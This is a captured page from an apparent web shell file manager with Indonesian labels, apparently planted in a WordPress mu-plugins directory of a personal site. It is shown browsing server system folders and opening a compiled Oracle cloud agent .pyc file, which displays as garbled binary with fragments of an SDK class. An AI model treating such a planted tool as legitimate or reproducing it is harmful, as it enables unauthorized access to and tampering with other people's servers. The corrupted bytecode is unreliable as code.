📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
network_load_balancer
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/network_load_balancer/models
💾
Free:
45.6 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: update_backend_set_details.pyc
a O��f` � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdd� Zedd� �Zej dd� �Zed d � �Z e j dd � �Z edd � �Zej dd � �Zedd� �Zej dd� �Zedd� �Z e j dd� �Z dd� Zdd� Zdd� ZdS )�UpdateBackendSetDetailsa� The configuration details for updating a load balancer backend set. For more information about backend set configuration, see `Managing Backend Sets`__. **Caution:** Oracle recommends that you avoid using any confidential information when you supply string values using the API. __ https://docs.cloud.oracle.com/Content/Balance/Tasks/managingbackendsets.htm �IPV4�IPV6c K sF dddddd�| _ dddd d d�| _d| _d| _d| _d| _d| _dS )ay Initializes a new UpdateBackendSetDetails object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param policy: The value to assign to the policy property of this UpdateBackendSetDetails. :type policy: str :param is_preserve_source: The value to assign to the is_preserve_source property of this UpdateBackendSetDetails. :type is_preserve_source: bool :param ip_version: The value to assign to the ip_version property of this UpdateBackendSetDetails. Allowed values for this property are: "IPV4", "IPV6" :type ip_version: str :param backends: The value to assign to the backends property of this UpdateBackendSetDetails. :type backends: list[oci.network_load_balancer.models.BackendDetails] :param health_checker: The value to assign to the health_checker property of this UpdateBackendSetDetails. :type health_checker: oci.network_load_balancer.models.HealthCheckerDetails �str�boolzlist[BackendDetails]�HealthCheckerDetails)�policy�is_preserve_source� ip_version�backends�health_checkerr �isPreserveSource� ipVersionr � healthCheckerN)� swagger_types� attribute_map�_policy�_is_preserve_source�_ip_version� _backends�_health_checker)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/network_load_balancer/models/update_backend_set_details.py�__init__ s"